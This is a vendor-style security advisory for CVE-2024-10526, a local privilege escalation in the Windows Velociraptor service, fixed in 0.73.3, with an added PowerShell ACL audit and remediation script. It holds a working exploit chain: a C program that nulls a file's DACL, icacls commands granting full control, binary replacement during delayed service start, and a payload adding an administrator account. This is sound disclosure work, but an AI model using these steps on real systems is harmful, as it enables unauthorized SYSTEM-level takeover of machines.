Local privilege escalation in Windows Velociraptor service
21/11/2024
Product
Velociraptor
Severity
High
Fixed Version(s)
0.73.3
Affected Version(s)
< 0.73.3
CVE Number
CVE-2024-10526
Authors
Description
Presentation
Velociraptor is an advanced digital forensic and incident response tool that permits collecting host-based state information using the Velociraptor Query Language (VQL).
Issue(s)
The MSI installer file grants dangerous permissions to standard users, such as the capability to modify the ACLs of the installation directory, configuration files and binaries. Standard users can then grant themselves full control over the files, leading to command execution as SYSTEM.
Timeline
Date | Description |
---|---|
2024.10.29 | Advisory sent to Rapid7 |
2024.11.03 | 0.73.3 was released to address this issue |
2024.11.22 | Public release |
Technical details
Description
When installed, the MSI installer grants BUILTIN\Users the WRITE_DAC permission over the C:\Program Files\Velociraptor\ directory and all its child objects, including C:\Program Files\Velociraptor\Velociraptor.exe, the binary used by the service, which runs as SYSTEM.
PS C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe
.\Velociraptor.exe BUILTIN\Users:(I)(WDAC)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
Successfully processed 1 files; Failed processing 0 files
The WRITE_DAC permission allows a standard user to modify the ACL of the aforementioned file, and thus to grant themselves the Full Control permission over the binary. The whole C:\Program Files\Velociraptor directory is affected by this behavior, so configuration files and other binaries can be tampered with too.
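An added audit script, not part of the advisory or of Velociraptor itself, that lists every allow ACE under the install directory granting BUILTIN\Users, Authenticated Users or Everyone the right to change permissions, take ownership, write or delete, and with -Remediate removes the explicit offending entries from the directory so the inherited (I)(WDAC) entries on child files disappear. The install path and the principal list are assumptions; run it from an elevated PowerShell after upgrading to a fixed version.

```powershell
# Added example: audit (and optionally fix) the Velociraptor install directory ACL.
# Not part of the advisory or of Velociraptor; install path is an assumption.
param(
    [string]$InstallDir = 'C:\Program Files\Velociraptor',
    [switch]$Remediate
)
$FSR = [System.Security.AccessControl.FileSystemRights]
# Rights that let a low-privileged principal rewrite the ACL or replace a file.
$Dangerous = $FSR::ChangePermissions -bor $FSR::TakeOwnership -bor
             $FSR::WriteData -bor $FSR::Delete
# Principals that must not hold those rights on a SYSTEM service's files.
$LowPrivSids = 'S-1-5-32-545', 'S-1-5-11', 'S-1-1-0'  # Users, Authenticated Users, Everyone

function Test-WeakAce {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    try {
        $sid = $Ace.IdentityReference.Translate(
            [System.Security.Principal.SecurityIdentifier]).Value
    } catch { return $false }  # unresolvable principal: not one of the listed SIDs
    return ($LowPrivSids -contains $sid) -and
           (([int]$Ace.FileSystemRights -band [int]$Dangerous) -ne 0)
}

$items = @(Get-Item -LiteralPath $InstallDir) +
         @(Get-ChildItem -LiteralPath $InstallDir -Recurse -Force)
$findings = foreach ($item in $items) {
    foreach ($ace in (Get-Acl -LiteralPath $item.FullName).Access) {
        if (Test-WeakAce $ace) {
            [pscustomobject]@{
                Path = $item.FullName; Principal = $ace.IdentityReference.Value
                Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited
            }
        }
    }
}
if (-not $findings) { Write-Host "No weak ACEs under $InstallDir"; return }
$findings | Format-Table -AutoSize

if ($Remediate) {
    # Inherited entries (the (I)(WDAC) seen on Velociraptor.exe) cannot be removed
    # on the child; removing the explicit entry on the directory propagates down.
    $rootAcl = Get-Acl -LiteralPath $InstallDir
    foreach ($ace in @($rootAcl.Access | Where-Object { -not $_.IsInherited -and (Test-WeakAce $_) })) {
        [void]$rootAcl.RemoveAccessRule($ace)
    }
    Set-Acl -LiteralPath $InstallDir -AclObject $rootAcl  # requires an elevated session
}
```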
To perform such a modification, the following C program was developed:
#include <windows.h>
#include <stdio.h>
#include <sddl.h>

int main(int argc, char *argv[])
{
    SECURITY_DESCRIPTOR sd = { 0 };
    BOOL status;

    if (argc < 2) {
        printf("usage: %s <file>\n", argv[0]);
        return 1;
    }

    /* Start from an empty security descriptor. */
    status = InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
    if (status == FALSE) {
        printf("InitializeSecurityDescriptor error: %x\n", GetLastError());
        return 1;
    }

    /* Mark the DACL as present but NULL: a NULL DACL means no restrictions. */
    status = SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
    if (status == FALSE) {
        printf("SetSecurityDescriptorDacl error: %x\n", GetLastError());
        return 1;
    }

    /* Only the DACL is written; WRITE_DAC on the file is enough for this call. */
    status = SetFileSecurityA(argv[1], DACL_SECURITY_INFORMATION, &sd);
    if (status == FALSE) {
        printf("SetFileSecurityA error: %x\n", GetLastError());
        return 1;
    }
    printf("ACL successfully removed!\n");
    return 0;
}
Once launched, the ACL entries of the binary were cleared:
PS C:\Program Files\Velociraptor> EraseDACL.exe "C:\Program Files\Velociraptor\Velociraptor.exe"
ACL successfully removed!
After that, users can give themselves full control over the binary:
C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe /grant BUILTIN\Users:(F)
file processed : .\Velociraptor.exe
Successfully processed 1 files; Failed processing 0 files
C:\Program Files\Velociraptor> icacls.exe .\Velociraptor.exe
.\Velociraptor.exe BUILTIN\Users:(F)
BUILTIN\Users:(I)(WDAC)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
However, at this point, the service does not permit low privileged users to stop it or kill the process, thus it was not possible to replace the binary while the service was in use.
PS C:\Program Files\Velociraptor> sc.exe sdshow velociraptor
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
But it was noted that the service is configured to start with a delay:
PS C:\Program Files\Velociraptor> sc.exe qc velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
SERVICE_START_NAME : LocalSystem
On Windows, and without further configuration, this setting means the service starts about two minutes after all the other automatic-start services have started.
As a consequence, it was possible to reboot the machine, copy another binary over the legitimate one during that delay, and monitor the service exit code to know when the new binary had been launched:
C:\Users\user> sc queryex velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 0
FLAGS :
C:\Users\user> copy adduser.exe "C:\Program Files\Velociraptor\Velociraptor.exe"
Overwrite C:\Program Files\Velociraptor\Velociraptor.exe? (Yes/No/All): Yes
1 file(s) copied.
C:\Users\user> sc queryex velociraptor
SERVICE_NAME: velociraptor
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 0
FLAGS :
The adduser.exe binary simply added a local user with administrator privileges on the machine:
#include <Windows.h>
#include <stdlib.h>  /* system() */

int main(int argc, char *argv[])
{
    /* Runs as SYSTEM once the service starts the replaced binary. */
    system("net user synacktiv Password1 /add");
    system("net localgroup Administrators synacktiv /add");
    return 0;
}
After the execution of the binary by the service, the user is indeed created, thus permitting privilege escalation:
C:\Users\user> net user synacktiv
User name synacktiv
Full Name
[...]
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
Impact
This vulnerability is an arbitrary code execution via the modification of the binary run by a service. It can be used to execute code as SYSTEM by overwriting the Velociraptor.exe file in C:\Program Files\Velociraptor\ and triggering the start of the Velociraptor service.